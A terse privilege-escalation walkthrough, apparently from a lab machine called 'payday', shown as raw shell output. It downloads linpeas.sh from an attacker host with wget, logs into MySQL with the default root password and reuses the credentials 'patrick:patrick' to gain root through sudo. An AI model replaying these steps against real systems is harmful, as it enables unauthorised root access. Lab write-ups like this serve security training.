Priv Esc

$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

www-data@payday:/dev/shm$ wget 192.168.45.233/linpeas.sh
--21:40:03--  http://192.168.45.233/linpeas.sh
           => `linpeas.sh'
Connecting to 192.168.45.233:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860,335 (840K) [text/x-sh]

100%[====================================>] 860,335      563.87K/s             

21:40:04 (562.51 KB/s) - `linpeas.sh' saved [860335/860335]

www-data@payday:/dev/shm$ chmod +x linpeas.sh

www-data@payday:/dev/shm$ mysql -u root -p
Enter password: root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 84
Server version: 5.0.45-Debian_1ubuntu3-log Debian etch distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> 

patrick:patrick

patrick@payday:/dev/shm$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for patrick:
User patrick may run the following commands on this host:
    (ALL) ALL

patrick@payday:/dev/shm$ sudo -i
root@payday:~# whoami && cat /root/proof.txt && ip a
root
5c2448a2a217c820d72a51cb80502ec7
1: lo: <LOOPBACK,UP,10000> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:50:56:bf:12:f9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.217.39/24 brd 192.168.217.255 scope global eth0
    inet6 fe80::250:56ff:febf:12f9/64 scope link 
       valid_lft forever preferred_lft forever